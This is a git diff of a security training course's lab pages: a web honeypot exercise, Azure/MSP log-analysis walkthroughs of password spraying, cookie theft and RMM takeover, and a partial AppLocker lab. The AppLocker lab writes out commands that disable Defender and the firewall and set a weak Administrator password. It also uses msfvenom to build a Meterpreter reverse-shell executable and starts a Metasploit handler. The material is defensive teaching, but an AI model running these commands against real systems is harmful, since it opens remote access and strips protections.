rename to IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-40-15.png
diff --git a/IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-41-30.png b/IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-41-30.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-41-30.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-41-30.png
diff --git a/IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-43-26.png b/IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-43-26.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-43-26.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-43-26.png
diff --git a/IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-44-21.png b/IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-44-21.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-44-21.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-44-21.png
diff --git a/IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-47-09.png b/IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-47-09.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-47-09.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-47-09.png
diff --git a/IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-47-43.png b/IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-47-43.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-47-43.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-47-43.png
diff --git a/IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-48-15.png b/IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-48-15.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-48-15.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-48-15.png
diff --git a/IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-49-31.png b/IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-49-31.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-49-31.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-49-31.png
diff --git a/IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-50-54.png b/IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-50-54.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/webhoneypot/attachment/Clipboard_2021-03-12-11-50-54.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/attachment/Clipboard_2021-03-12-11-50-54.png
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/webhoneypot.md b/IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/webhoneypot.md
new file mode 100644
index 00000000..fc221787
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/webhoneypot.md
@@ -0,0 +1,157 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+ 
+
+# Web Honeypot 
+
+- In this lab we will be running a very simple web honeypot.  Basically, it runs a fake Outlook Web Access page and logs the attacks.  
+
+- This is a good approach as attackers constantly go after anything that looks like an authentication portal. 
+
+- Let's get started. 
+
+- First we will need to open a Linux Terminal:
+
+
+
+
+- Open **Ubuntu Shell**
+
+<img width="90" height="104" alt="Screenshot From 2026-02-23 10-28-37" src="https://github.com/user-attachments/assets/ae6d408b-7622-4545-b849-aef3d8fa0cb4" />
+
+
+- Now, let's start the honeypot: 
+
+```bash
+sudo docker run --rm -it -p 80:80 --name owa-container owa-honeypot
+```
+
+- It should look like this: 
+
+<img width="1102" height="267" alt="docker_run" src="https://github.com/user-attachments/assets/b03c3e17-1fce-4908-b87b-97dffb8d759c" />
+
+
+- Now, let's start another Linux Terminal. 
+
+
+
+
+- Open **Ubuntu Shell**
+
+<img width="90" height="104" alt="Screenshot From 2026-02-23 10-28-37" src="https://github.com/user-attachments/assets/ae6d408b-7622-4545-b849-aef3d8fa0cb4" />
+
+
+
+- Let's get your Linux IP address. 
+
+```bash
+ifconfig
+```
+
+- Then, gain a shell to the **owa-container** container. Take its CONTAINER ID with the following command.
+
+```bash
+sudo docker ps
+```
+
+<img width="1826" height="137" alt="container_id" src="https://github.com/user-attachments/assets/6dbd1a45-d92a-4a91-81e3-528770309aec" />
+
+
+- Take shell at the container.
+
+```bash
+sudo docker exec -it <CONTAINER-ID> bash
+```
+
+<img width="1812" height="163" alt="docker_shell" src="https://github.com/user-attachments/assets/14b378c5-2df1-4954-82b3-8f6336db5647" />
+
+
+Now, lets tail the **dumppass log**. 
+
+```bash
+tail -f dumpass.log
+``` 
+
+- Now, let's open a browser window and surf to the **honeypot**: 
+
+```bash
+http://YOURLINUXIP
+```
+
+<img width="1280" height="826" alt="web_portal" src="https://github.com/user-attachments/assets/c1073b63-d0f9-49c9-bbed-adaea177e39d" />
+
+
+- Now, try a bunch of **User IDs** and **passwords**. 
+
+- Now, go back to the Ubuntu **Terminal** with the log and you should see the **IP address** and **UserID/Password** of the attempts. 
+
+<img width="1898" height="156" alt="web_logs" src="https://github.com/user-attachments/assets/24c226d4-0c8b-44e0-8af2-0081b0475bd7" />
+
+
+- Now, let's attack it. 
+
+- Select **OWASP ZAP** on your desktop. 
+
+![image](https://github.com/user-attachments/assets/6493b57a-bb9d-4886-8e15-735ce63a93c7)
+
+- Once **ZAP!** opens, select **Automated Scan**: 
+
+![](attachment/Clipboard_2021-03-12-11-48-15.png) 
+
+- When Automated Scan opens, please put you Kali Linux **IP** in the URL to attack box and select **Attack**. 
+
+- It should look like this: 
+
+![image](https://github.com/user-attachments/assets/c291f9f9-3730-49a6-a874-7d7df5dc5d8e)
+
+- After a while, you should see some attack strings in your Logs.
+
+<img width="1372" height="767" alt="requests_logs" src="https://github.com/user-attachments/assets/2511d32c-9d27-4306-930c-0eb18851408b" />
+
+
+Yes...  Some attack tools are as obvious as **ZAP:ZAP**. 
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/Glastopf.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/pcap/AdvancedC2PCAPAnalysis.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
+
+  
+
+  
+
+  
+
+  
+
+  
+
+  
+
+  
+
+  
+
+  
+
+  
+
+  
+
+ 
+
+ 
+
+
+
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/README.md b/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/README.md
index cc16f75d..32cf82e7 100644
--- a/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/README.md
+++ b/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/README.md
@@ -6,8 +6,19 @@ In this lab we will navigate through log files of an attack simulation on an MSP
 * [Lab 2 - Machine Pivoting](./ws_3_security_logs.md)
 * [Lab 3 - Cookie Theft](./cookie_theft.md)
 * [Lab 4 - Full Domain PWN](./rmm_takeover.md)
-***
-[Back to the Navigation Menu](/IntroClassFiles/navigation.md)
 
 
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/azure_logs.md)</i></b>
 
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/PingCastle.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
diff --git a/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/azure_logs.md b/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/azure_logs.md
index 8478ab48..7ffafa19 100644
--- a/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/azure_logs.md
+++ b/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/azure_logs.md
@@ -2,43 +2,47 @@
 
 [*Download the log file to follow along*](./logs/InteractiveSignIns_Domain_spray_logs.csv)
 
-In this walkthrough we will be taking a look at a log file that was pulled from **Azure**.
+- In this **walkthrough** we will be taking a look at a log file that was pulled from **Azure**.
 
-[Azure](https://azure.microsoft.com/en-us) is a service provided by Microsoft to move a **Domain** into the cloud. While we know the **Domain Controller** records logins if the user used Azure, we need to pull logs to see the failed, attempted, and successful logins.
+-  [Azure](https://azure.microsoft.com/en-us) is a service provided by Microsoft to move a **Domain** into the cloud. While we know the **Domain Controller** records logins if the user used Azure, we need to pull logs to see the failed, attempted, and successful logins.
 
-Our goal is to find how attackers may have initially accessed our **domain network**.
+- Our goal is to find how attackers may have initially accessed our **domain network**.
 
-When we first crack open our log file in notepad, we notice a few things. First, this log file contains **IP addresses**. This is useful for us trying to identify which systems are logging into which account. This logging supplies the time stamp, the account attempting to be accessed, and how they accessed us. With this in mind let’s continue our investigation.
+- When we first crack open our log file in **notepad**, we notice a few things. First, this log file contains **IP addresses**. This is useful for us trying to identify which systems are logging into which **account**. This logging supplies the time stamp, the account attempting to be accessed, and how they accessed us. With this in mind let’s continue our investigation.
 
 ![Login Times](./images/login_times.PNG)
 
-After scrolling down for a bit, the first thing we should notice is the number of logins all within **seconds** of each other. The chances of every employee attempting to login at the same exact time is nearly **impossible**. This could be an indication that someone is trying to **brute force** login credentials.
+- After scrolling down for a bit, the first thing we should notice is the number of logins all within **seconds** of each other. The chances of every employee attempting to login at the same exact time is nearly **impossible**. This could be an indication that someone is trying to **brute force** login credentials.
 
-Let's look closer at the **remote IP addresses**. If they're all the same IP that can give us an indication that either one person is trying to login to all of these accounts or that all the employees are logging in from the same network **(possible, not probable)**.
+- Let's look closer at the **remote IP addresses**. If they're all the same IP that can give us an indication that either one person is trying to login to all of these accounts or that all the employees are logging in from the same network **(possible, not probable)**.
 
 ![Login IPs](./images/login_ips.PNG)
 
-All of these logins that are within a few seconds of each other come from the same exact **IP**. If you look closer, you can see that **almost all** attempts failed.
+- All of these **logins** that are within a few seconds of each other come from the same exact **IP**. If you look closer, you can see that **almost all** attempts failed.
 
-That is not a good sign.  That means that someone was doing a [brute force spray attack](https://owasp.org/www-community/attacks/Password_Spraying_Attack) at our **domain**. But there's nothing to worry about as long as no user got compromised right?
+- That is not a good sign.  That means that someone was doing a [brute force spray attack](https://owasp.org/www-community/attacks/Password_Spraying_Attack) at our **domain**. But there's nothing to worry about as long as no user got compromised right?
 
-Let's go through the logs and make sure all attempts are **failed** before we escalate this incident.
+- Let's go through the logs and make sure all attempts are **failed** before we escalate this incident.
 
 ![Found Creds](./images/found_creds.PNG)
 
-It looks like **Paul Bowman’s** password was discovered by an attacker during this domain spray. Did the attacker realize that the password was correct and log in? Let's look above all the attempted logins for any activity from **Paul Bowman**.
+- It looks like **Paul Bowman’s** password was discovered by an attacker during this domain spray. Did the attacker realize that the password was correct and log in? Let's look above all the attempted logins for any activity from **Paul Bowman**.
 
 ![successful login](./images/successful_login.PNG)
 
-It looks like the attacker found his way into the domain through **Paul Bowman's** login information. We can see the success message from a login attempt to the domain.
+- It looks like the attacker found his way into the domain through **Paul Bowman's** login information. We can see the success message from a login attempt to the domain.
 
-***
-***Continuing on to the next Lab?***
+>[!IMPORTANT]
+>Always when an attack has occured, look for **persistance** and **lateral movement**, ALWAYS!
 
-[Click here to get back to the Navigation Menu](/IntroClassFiles/navigation.md)
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/ws_3_security_logs.md)</i></b>
 
-***Finished with the Labs?***
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/README.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
 
+***Finished with the Labs?***
 
 Please be sure to destroy the lab environment!
 
diff --git a/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/cookie_theft.md b/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/cookie_theft.md
index c46081d5..684eb3c9 100644
--- a/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/cookie_theft.md
+++ b/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/cookie_theft.md
@@ -2,48 +2,65 @@
 
 [*Download the log file to follow along*](./logs/cookie_theft.csv)
 
-At this point we know that the attacker is trying to **pivot** in the network.
+- At this point we know that the attacker is trying to **pivot** in the network.
 
-If the attacker got another user to run a malicious file, what will they do next? Well, this user was a slightly more privileged user and may have access to information an attacker may want.
+- If the attacker got another user to run a **malicious file**, what will they do next? Well, this user was a slightly more privileged user and may have access to information an attacker may want.
 
-Let's take the security logs from the workstation that **Paul Bowman** pivoted to and see if we can see what the malicious executable is doing. 
+- Let's take the **security logs** from the workstation that **Paul Bowman** pivoted to and see if we can see what the malicious executable is doing. 
 
-**!!! NOTE: 
-    Once again, the logs file is unique. Please download with the link above and open with notepad or another text editor.**
+>[!NOTE] 
+>Once again, the logs file is unique. Please **download** with the link above and open with notepad or another text editor.**
 
-If the attacker is running commands and scripts to access sensitive information our audit logs should contain evidence of what happened.
+- If the attacker is running commands and scripts to access **sensitive information** our audit logs should contain evidence of what happened.
 
-The Audit number that indicates something has attempted to access an object is **"4663"**. Use **"ctrl + f"** and type **"4663"** and tab through the logs. If the attacker did access a sensitive file, it will have the process name of **"SuperSpecializedHighlyAdvancedMalwareBypasser2.exe"**.
+- The Audit number that indicates something has attempted to access an object is **"4663"**. Use **"ctrl + f"** and type **"4663"** and tab through the logs. If the attacker did access a sensitive file, it will have the process name of **"SuperSpecializedHighlyAdvancedMalwareBypasser2.exe"**.
 
-We have found a very important **Audit** event.
+- We have found a very important **Audit** event.
 
-* <span style="color:red">RED: </span> Contains Process 4663 and the text **"An attempt was made to access an object"**.  This indicates that someone has tried to access something, but we need more information to go off of to get the full story.
+<pre>
+Contains Process 4663 and the text "An attempt was made to access an object". This indicates that someone has tried
+to access something, but we need more information to go off of to get the full story.
+</pre>
 
-* <span style="color:green">GREEN: </span> Contains the username **henry.butler**.  We know already that **henry.butler** was the next user to get compromised.
+<pre>
+Contains the username henry.butler. We know already that henry.butler was the next user to get compromised.
+</pre>
 
-* <span style="color:#B8860B">YELLOW: </span>This shows the directory accessed. It looks like something has accessed the cookies of Google Chrome, but the only program that should do that is Chrome itself. If another program has accessed it, then we know that the **users'** cookies have been stolen.
+<pre>
+This shows the directory accessed. It looks like something has accessed the cookies of Google Chrome, but the only
+program that should do that is Chrome itself. If another program has accessed it, then we know that the users'
+cookies have
+been stolen.
+</pre>
 
-* <span style="color:purple">PURPLE: </span>Shows which program accessed the folder and files. It looks like "**SuperSpecializedHighlyAdvancedMalwareBypasser2.exe**" is the culprit. This is not good.  The attacker has just stolen the cookies for **henry.butler** who we know has access to our **RMM**.
+<pre>
+Shows which program accessed the folder and files. It looks like "SuperSpecializedHighlyAdvancedMalwareBypasser2.exe"
+is the culprit. This is not good. The attacker has just stolen the cookies for henry.butler who we know has access
+to our RMM.
+</pre>
 
 <br>
 
 ![cookie being stolen](./images/pivot.PNG)
 
-It looks like the attacker is dumping the **users'** cookies to gain access to accounts on the web. Does this user have access to any important accounts or frameworks? **Yes!**  This user has access to a **RMM** that manages the domain. If an attacker gains access to the RMM, then all of our computers may get taken over.
+- It looks like the attacker is dumping the **users'** cookies to gain access to accounts on the web. Does this user have access to any important accounts or frameworks? **Yes!**  This user has access to a **RMM** that manages the domain. If an attacker gains access to the RMM, then all of our computers may get taken over.
 
 Not to worry though, right? Most **RMM** uses **MFA** and there's nothing to worry about.
 
 Right?
 
-Unfortunately, the cookie theft and reuse occur attackers are hijacking a session that already went through **MFA**, so the attacker can effectively bypass **MFA**. But before we panic let's check our **RMM** logs and see if the attacker has done anything.
+- Unfortunately, the cookie theft and reuse occur attackers are hijacking a session that already went through **MFA**, so the attacker can effectively bypass **MFA**. But before we panic let's check our **RMM** logs and see if the attacker has done anything.
 
-***
-***Continuing on to the next Lab?***
 
-[Click here to get back to the Navigation Menu](/IntroClassFiles/navigation.md)
 
-***Finished with the Labs?***
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/rmm_takeover.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/ws_3_security_logs.md)</i></b>
 
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
 
 Please be sure to destroy the lab environment!
 
diff --git a/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/rmm_takeover.md b/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/rmm_takeover.md
index 503c15de..7222e459 100644
--- a/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/rmm_takeover.md
+++ b/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/rmm_takeover.md
@@ -2,32 +2,33 @@
 
 [*Download the log file to follow along*](./logs/Activities-rmm.csv)
 
-At this point in our investigation, it is becoming clear that the attacker didn't just compromise one machine but may have compromised the **entire** domain.
+- At this point in our investigation, it is becoming clear that the attacker didn't just **compromise** one machine but may have compromised the **entire** domain.
 
-An **RMM** is a tool that is used to remote manage and monitor workstations. Most **RMMs** have the capability to access the **CLI** of a workstation and push automated scripts to assist an **IT admin** help push updates en mass.
+- An **RMM** is a tool that is used to remote manage and monitor workstations. Most **RMMs** have the capability to access the **CLI** of a workstation and push automated scripts to assist an **IT admin** help push updates en mass.
 
-Let's crack open the log and confirm our worst fears and suspicions.
+- Let's crack open the **log** and confirm our worst fears and suspicions.
 
-**!!! NOTE: 
-    Once again, the logs file is unique to this part of the lab. Please redownload with the link above and open in notepad or another text editor.**
+>[!NOTE]
+>Once again, the logs file is unique to this part of the lab. Please **download** with the link above and open in notepad or another text editor.**
 
 ![rmm execution](./images/fullpwn.PNG)
 
-It is worth noting the lack of logs here, since these **RMM** logs are mainly recording its own activity. It is not logging the data from the computer it's connected to.  We can see that a script has recently been run.
+- It is worth noting the lack of logs here, since these **RMM** logs are mainly recording its own activity. It is not logging the data from the **computer it's connected to**.  We can see that a **script** has recently been run.
 
-It looks like the attacker has pushed a script to execute malware on every machine with the **RMM** tool running on it, including the **domain controller**.
+- It looks like the attacker has pushed a script to **execute malware** on every machine with the **RMM** tool running on it, including the **domain controller**.
 
-It is safe to assume that every single machine on the network is compromised, which is not good.
+- It is safe to assume that every single machine on the network is **compromised**, which is not good.
 
-This **small** breach has just become a **huge** disaster and will need Escalation and Incident Response.
+- This **small** breach has just become a **huge** disaster and will need **Escalation** and **Incident Response**.
 
-***
-***Continuing on to the next Lab?***
 
-[Click here to get back to the Navigation Menu](/IntroClassFiles/navigation.md)
+***                                                              
 
-***Finished with the Labs?***
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/cookie_theft.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
 
+***Finished with the Labs?***
 
 Please be sure to destroy the lab environment!
 
diff --git a/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/ws_3_security_logs.md b/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/ws_3_security_logs.md
index 46fb17b0..d59c66c1 100644
--- a/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/ws_3_security_logs.md
+++ b/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/ws_3_security_logs.md
@@ -2,32 +2,35 @@
 
 [*Download the log file to follow along*](./logs/ws-3-security.csv)
 
-After the discovery of the compromised user, **(Paul Bowman)**, we decided to go through the security logs of each workstation to look for any suspicious files being run or used by other users.
+- After the discovery of the compromised user, **(Paul Bowman)**, we decided to go through the security logs of each workstation to look for any suspicious files being run or used by other users.
 
-The compromised user may try to **pivot** to other computers and try to gain access to other systems. [Pivoting](https://www.geeksforgeeks.org/pivoting-moving-inside-a-network/) is a technique used by an attacker to try to compromise additional systems and try to escalate there privileges from a regular user to an **administrator**. So, where do we start? **Workstation 3** has suspicious activity in its security log files we should take a look at.
+- The compromised user may try to **pivot** to other computers and try to gain access to other systems. [Pivoting](https://www.geeksforgeeks.org/pivoting-moving-inside-a-network/) is a technique used by an attacker to try to compromise additional systems and try to escalate there privileges from a regular user to an **administrator**. So, where do we start? **Workstation 3** has suspicious activity in its security log files we should take a look at.
 
-**!!! NOTE
-    The log file for this portion is a different file. Please download it above.**
+>[!NOTE]
+>The log file for this portion is a different file. Please **download** it above.
 
-Open the log file in notepad and press **"ctrl + f"** and type **"Process Name:"** and hit Enter then tab to every executable that has run on the workstation.
+- **Open** the log file in notepad and press `ctrl + f` and type `Process Name:` and hit `Enter` then `Tab` to every executable that has run on the **workstation**.
 
-We are looking for anything out of the ordinary. We are starting on process names because it is the most likely attack vendor. If any malicious files were ran it may be in the audit logs. As a way to confirm strange behavior.  We should also look to see if the user running the file is anyone other than **Paul Bowman**. This can help us understand if the attacker tried to spread through our network.
+- We are looking for **anything out of the ordinary**. We are starting on process names because it is the most likely attack vendor. If any **malicious files** were ran it may be in the audit logs. As a way to confirm strange behavior.  We should also look to see if the user running the file is anyone other than **Paul Bowman**. This can help us understand if the attacker tried to spread through our network.
 
 ![Sysmon Extract All](./images/search.PNG)
 
-After tabbing through the log file and carefully looking over executables we should take note of this...
+- After tabbing through the log file and carefully looking over **executables** we should take note of this...
 
 ![Sysmon Extract All](./images/find_next.PNG)
 
-At first it may not be totally obvious, but the name seems *slightly* suspicious and is not a normal system file like **mmc** or **event viewer**. It looks like the file was served through a file share on **Workstation 1**, which was the machine that **Paul Bowman** was using. It is also important to take notice of the username, the attacker has moved from Paul into a **new** user. This means the attacker was **pivoting** in this environment.
+- At first it may not be totally obvious, but the name seems *slightly* suspicious and is not a normal system file like **mmc** or **event viewer**. It looks like the file was served through a file share on **Workstation 1**, which was the machine that **Paul Bowman** was using. It is also important to take notice of the username, the attacker has moved from Paul into a **new** user. This means the attacker was **pivoting** in this environment.
 
-***
-***Continuing on to the next Lab?***
 
-[Click here to get back to the Navigation Menu](/IntroClassFiles/navigation.md)
 
-***Finished with the Labs?***
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/cookie_theft.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/azure_logs.md)</i></b>
 
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
 
 Please be sure to destroy the lab environment!
 
diff --git a/IntroClassFiles/Tools/IntroClass/AppLocker/AppLocker.md b/IntroClassFiles/Tools/IntroClass/AppLocker/AppLocker.md
index 6748386d..d615d3be 100755
--- a/IntroClassFiles/Tools/IntroClass/AppLocker/AppLocker.md
+++ b/IntroClassFiles/Tools/IntroClass/AppLocker/AppLocker.md
@@ -9,12 +9,15 @@ Let’s see what happens when we do not have **AppLocker** running.  We will set
 
 Before we begin, we need to disable **Defender**. Start by opening an instance of **Windows Powershell**. Do this by clicking on the **Powershell** icon in the taskbar.
 
-![](attachments/OpeningPowershell.png)
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-15" src="https://github.com/user-attachments/assets/b51c10be-34d9-446a-be52-8ceb319815ac" />
+
 
 
 Next, run the following command in the **Powershell** terminal:
 
-<pre>Set-MpPreference -DisableRealtimeMonitoring $true</pre>
+```ps
+Set-MpPreference -DisableRealtimeMonitoring $true
+```
 
 ![](attachments/applocker_disabledefender.png)
 
@@ -24,113 +27,150 @@ If you get angry red errors, that is **Ok**, it means **Defender** is not runnin
 
 Next, lets ensure the firewall is disabled. In a Windows Command Prompt.
 
-<pre> netsh advfirewall set allprofiles state off</pre>
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-56" src="https://github.com/user-attachments/assets/3d9509ba-9139-4304-8f52-6854fee2b43c" />
+
+
+```cmd
+netsh advfirewall set allprofiles state off
+```
 
 
 Next, set a password for the Administrator account that you can remember
 
-<pre>net user Administrator password1234</pre>
+```cmd
+net user Administrator password1234
+```
 
 Please note, that is a very bad password.  Come up with something better. But, please remember it.
 
-Before we move on from our Powershell window, lets get our IP by running the following command:
 
-<pre>ipconfig</pre>
 
-![](attachments/powershellipconfig.png)
 
-**REMEMBER - YOUR IP WILL BE DIFFERENT**
+- To open a **Linux Shell**, either **double-click** `Ubuntu Shell` on Desktop
 
-Write this IP down so we can use it again later.
+<img width="90" height="104" alt="Screenshot From 2026-02-23 10-28-37" src="https://github.com/user-attachments/assets/196f7867-877b-4a37-bc02-1214e50e96a5" />
 
-Let’s continue by opening a **Kali** instance.
 
-![](attachments/OpeningKaliInstance.png)
+- Or open **Command Prompt**
 
-Alternatively, you can click on the **Kali** icon in the taskbar.
+<img width="85" height="103" alt="image" src="https://github.com/user-attachments/assets/b2c7dbad-d57b-40d0-9318-ca8d40176c22" />
 
-![](attachments/TaskbarKaliIcon.png)
+- **SSH** into the **Linux** machine
+```bash
+ssh ubuntu@linux.cloudlab.lan
+```
 
-Let's start by getting root access in our terminal.
+<img width="247" height="25" alt="image" src="https://github.com/user-attachments/assets/69706053-abe6-4de7-aa48-d9fd739ec4a7" />
 
-<pre>sudo su -</pre>
 
-We need to run the following command in order to mount our remote system to the correct directory:
 
-<pre>mount -t cifs //[Your IP Address]/c$ /mnt/windows-share -o username=Administrator,password=password1234</pre>
 
-**REMEMBER - YOUR IP ADDRESS AND PASSWORD WILL BE DIFFERENT.**
 
-If you see the following error, it means that the device is already mounted.
 
-![](attachments/mounterror.png)
 
-If this is the case, ignore it.
-Run the following command to navigate into the mounted directory:
+Let's start by getting root access in our terminal.
 
-<pre>cd /mnt/windows-share</pre>
+```bash
+sudo su -
+```
 
-Before we run the next commands, we need to get the IP of our Kali System (AKA our Linux IP Adress). Lets do so by running the following:
+Before we run the next commands, we need to get the **IP** of our **Linux System**. Lets do so by running the following:
 
-<pre>ifconfig</pre>
+```bash
+ifconfig
+```
+
+<img width="716" height="175" alt="2026-02-23_10-33" src="https://github.com/user-attachments/assets/eb5b0547-6da5-4f35-8ce4-43580c8a97d7" />
 
-![](attachments/applocker_ifconfig.png)
 
 **REMEMBER: YOUR IP WILL BE DIFFERENT**
 
 Now, run the following commands to start a simple backdoor and backdoor listener: 
 
-<pre>msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=[Your Linux IP Address] lport=4444 -f exe -o /mnt/windows-share/TrustMe.exe</pre>
+```bash
+cd /tmp/
+```
+
+```bash
+msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=[Your Linux IP Address] lport=4444 -f exe > TrustMe.exe
+```
 
-Let's start the **Metasploit Handler**.  First, open a new **Kali** instance. The easiest way to do this is by clicking on the **Kali** icon in the taskbar.
+Let's start the **Metasploit Handler**
 
-![](attachments/TaskbarKaliIcon.png)
+```bash
+msfconsole -q
+```
 
-Before doing anything else, we need to run the following command in our new terminal window:
+<img width="577" height="91" alt="2026-02-23_10-44" src="https://github.com/user-attachments/assets/967b59aa-7a46-4286-9263-25c1bfe77192" />
 
-<pre>msfconsole -q</pre>
 
-![](attachments/msfconsole.png)
 
 The **Metasploit Handler** successfully ran if the terminal now starts with **"msf6 >"**
 
 Next, let's run the following:
 
-<pre>use exploit/multi/handler</pre>
+```bash
+use exploit/multi/handler
+```
 
 Now run all of the following commands to set the correct parameters:
 
-<pre>set PAYLOAD windows/meterpreter/reverse_tcp</pre>
+```bash
+set PAYLOAD windows/meterpreter/reverse_tcp
+```
 
